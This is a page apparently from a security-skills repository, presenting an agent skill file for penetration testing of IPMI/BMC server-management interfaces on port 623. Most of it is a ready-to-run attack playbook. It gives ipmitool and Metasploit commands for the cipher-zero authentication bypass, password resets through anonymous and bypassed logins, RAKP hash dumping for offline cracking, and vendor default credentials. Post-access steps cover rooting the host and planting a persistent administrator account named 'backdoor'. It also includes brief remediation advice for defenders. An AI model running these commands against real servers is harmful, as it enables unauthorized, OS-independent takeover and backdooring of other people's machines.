pentesting-ipmi

$npx mdskill add xalgord/xalgorix/pentesting-ipmi

- Default port `623/udp` (sometimes `623/tcp`) on Baseboard Management Controllers (BMC) — Supermicro, Dell iDRAC, HP iLO, IBM IMM, Fujitsu iRMC, Oracle/Sun ILOM, ASUS iKVM. - When `nmap`/scanners show `asf-rmcp`/`ipmi` on 623, or you find an out-of-band management LAN. - BMCs run independent of the host OS/power state, so compromise = persistent, OS-independent control of the server (power, KVM, serial-over-LAN, virtual media).

SKILL.md

.github/skills/pentesting-ipmiView on GitHub ↗
---
name: pentesting-ipmi
description: Testing IPMI / BMC out-of-band management interfaces (default 623/UDP, sometimes TCP) for the cipher-zero authentication bypass, RAKP password-hash retrieval, anonymous/default BMC credentials, cleartext password storage, and host takeover via KVM/SOL during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- ipmi
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting IPMI (port 623)

## When to Use
- Default port `623/udp` (sometimes `623/tcp`) on Baseboard Management Controllers (BMC) — Supermicro, Dell iDRAC, HP iLO, IBM IMM, Fujitsu iRMC, Oracle/Sun ILOM, ASUS iKVM.
- When `nmap`/scanners show `asf-rmcp`/`ipmi` on 623, or you find an out-of-band management LAN.
- BMCs run independent of the host OS/power state, so compromise = persistent, OS-independent control of the server (power, KVM, serial-over-LAN, virtual media).

## Quick Enumeration
```bash
# Find the port (UDP is primary)
nmap -n -p 623 10.0.0.0/24
nmap -n -sU -p 623 10.0.0.0/24

# Version identification
nmap -sU --script ipmi-version -p 623 10.10.10.10
msf > use auxiliary/scanner/ipmi/ipmi_version

# Install the client
apt-get install ipmitool
```

## Critical: Checks Most Often Missed
- **Cipher type 0 (cipher-zero) auth bypass** — IPMI 2.0 flaw (Dan Farmer): with a valid username, **any password is accepted**. Found across HP, Dell, Supermicro BMCs. List and modify users, including resetting passwords:
```bash
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list                 # any password works
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
```
- **RAKP password-hash retrieval** — the IPMI 2.0 RAKP handshake returns a salted hash (HMAC-MD5/SHA1) for any existing username; crack it offline:
```bash
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```
- **Anonymous access** — many BMCs ship with a null username/password account that can reset named accounts:
```bash
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
```
- **Default credentials** — Dell iDRAC `root:calvin`, IBM IMM `USERID:PASSW0RD` (zero), Supermicro `ADMIN:ADMIN`, Oracle/Sun ILOM `root:changeme`, ASUS iKVM `admin:admin`. (HP iLO uses a factory-randomized 8-char password.)
- **Cleartext password storage** — Supermicro stores IPMI passwords in `/nv/PSBlock` or `/nv/PSStore`; readable once you reach the BMC filesystem. Supermicro's UPnP SSDP listener (UDP 1900) had a root-RCE bug (`exploit/multi/upnp/libupnp_ssdp_overflow`).

### How to CONFIRM
- Cipher-zero: `auxiliary/scanner/ipmi/ipmi_cipher_zero` reports VULNERABLE, or `ipmitool ... -C 0 ... user list` returns the user table with a wrong password.
- Hash dump: `ipmi_dumphashes` outputs crackable `hmac` hashes per username.
- Anonymous: `ipmitool -U '' -P '' user list` returns the user table.
- Defaults: a documented vendor cred logs in (`user list` succeeds).

## Workflow

### Step 1: Enumerate
Sweep `623/udp`, identify IPMI version and vendor (`ipmi-version`). Vendor tells you which default creds and storage paths to try.

### Step 2: Authenticate / unauth access
Run cipher-zero and anonymous checks first (no creds needed). Dump RAKP hashes for every known username and crack offline (hashcat). Try vendor default creds.

### Step 3: Exploit / Extract
- With cipher-zero or recovered creds, enumerate and reset accounts via `ipmitool -I lanplus`.
- Crack dumped RAKP hashes to recover real BMC passwords.
- On Supermicro, read stored cleartext passwords (`cat /nv/PSBlock`) once on the BMC.

### Step 4: Post-access / pivot
Administrative BMC access => host takeover:
- **KVM / virtual media**: reboot host into a root shell via GRUB (`init=/bin/sh`) or boot a rescue ISO to manipulate the host disk (insert backdoor, extract data).
- **Serial-over-LAN (SOL)**: take over a logged-in physical/serial console via `ipmitool ... sol`.
- **Persistent backdoor account** (works from a compromised host's local BMC interface, no auth):
```bash
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4          # 4 = ADMINISTRATOR
ipmitool user list
```

## Key Concepts
| Concept | Description |
|---------|-------------|
| **BMC** | Baseboard Management Controller — independent micro-controller running IPMI; survives OS/power state |
| **Cipher 0** | IPMI 2.0 cipher suite that disables auth — any password accepted for a valid user |
| **RAKP** | IPMI 2.0 auth handshake that leaks a crackable salted password hash per username |
| **lanplus (-I lanplus)** | ipmitool interface for IPMI 2.0 over LAN (RMCP+) |
| **SOL / KVM** | Serial-over-LAN and remote keyboard/video/mouse — full host console control |
| **Anonymous login** | Null user/pass account enabled by default on many BMCs |

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **ipmitool** | Primary client: user mgmt, SOL, KVM, password reset (`-I lanplus -C 0`) |
| **nmap ipmi-version NSE** | Version/vendor fingerprint on 623/udp |
| **Metasploit ipmi_cipher_zero** | Detect cipher-zero auth bypass |
| **Metasploit ipmi_dumphashes** | Retrieve RAKP password hashes |
| **Metasploit ipmi_version** | Scanner for IPMI version |
| **hashcat** | Crack dumped RAKP HMAC-MD5/SHA1 hashes |

## Common Scenarios
### Scenario 1: Cipher-zero full control
A Supermicro BMC is cipher-zero vulnerable; `ipmitool -C 0` lists users and resets `root`, granting KVM/SOL access and a host reboot into a root shell.

### Scenario 2: Hash dump and crack
`ipmi_dumphashes` pulls the RAKP hash for `ADMIN`; hashcat recovers the password, which is reused on the host SSH/web interfaces.

### Scenario 3: Default creds to host takeover
A Dell iDRAC accepts `root:calvin`; virtual media mounts a rescue ISO and a backdoor is written to the host filesystem.

## Output Format
```
## IPMI / BMC Finding

**Service**: IPMI (623/udp)
**Severity**: <Critical|High>
**Target**: <IP>:623  Vendor/Version: <Supermicro | iDRAC | iLO ...> IPMI 2.0

### Evidence
- Cipher-zero auth bypass: VULNERABLE (user list returned with bogus password)
- RAKP hashes dumped for users: <ADMIN, root, ...> (cracked: <yes/no>)
- Anonymous/default creds: <'' / root:calvin> accepted
- Host impact: KVM/SOL access; backdoor account 'backdoor' (ADMINISTRATOR) added

### Reproduction
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H <IP> -U root -P anything user list

### Recommendation
1. Disable cipher suite 0 on all BMCs
2. Isolate BMCs on a dedicated management VLAN, never Internet-facing
3. Replace default/anonymous credentials; enforce strong unique BMC passwords
4. Patch BMC firmware (Supermicro UPnP/SSDP); restrict RAKP exposure
5. Disable unused KVM/SOL/virtual-media features
```

More from xalgord/xalgorix

SkillDescription
abusing-hop-by-hop-headersTesting proxies, load balancers, and CDNs for improper handling of HTTP hop-by-hop headers, where an
analyzing-macos-persistence-and-autostartEnumerating, planting, and hunting macOS persistence and auto-start (ASEP) locations during authorized
api-discoveryAPI endpoint discovery including OpenAPI/Swagger detection, hidden versioning, REST/GraphQL enumeration, and content negotiation
bypassing-binary-exploitation-mitigationsMethodology for identifying and defeating common binary hardening mitigations during authorized exploitation —
bypassing-captcha-protectionsIdentifying weaknesses in CAPTCHA implementations and bypassing them via replay, field removal,
bypassing-macos-gatekeeper-tcc-and-sipAssessing and bypassing macOS userland and platform security controls during authorized engagements -
bypassing-restricted-shellsEscaping restricted shells (rbash, rksh, lshell), chroot jails, and language sandboxes (Lua, Python)
bypassing-two-factor-and-otpIdentifying and exploiting flaws in two-factor authentication and one-time password verification
deepExhaustive security assessment with maximum coverage, depth, and vulnerability chaining
exploiting-ai-model-file-rceTesting machine-learning model files and model-loading services for remote code execution caused by insecure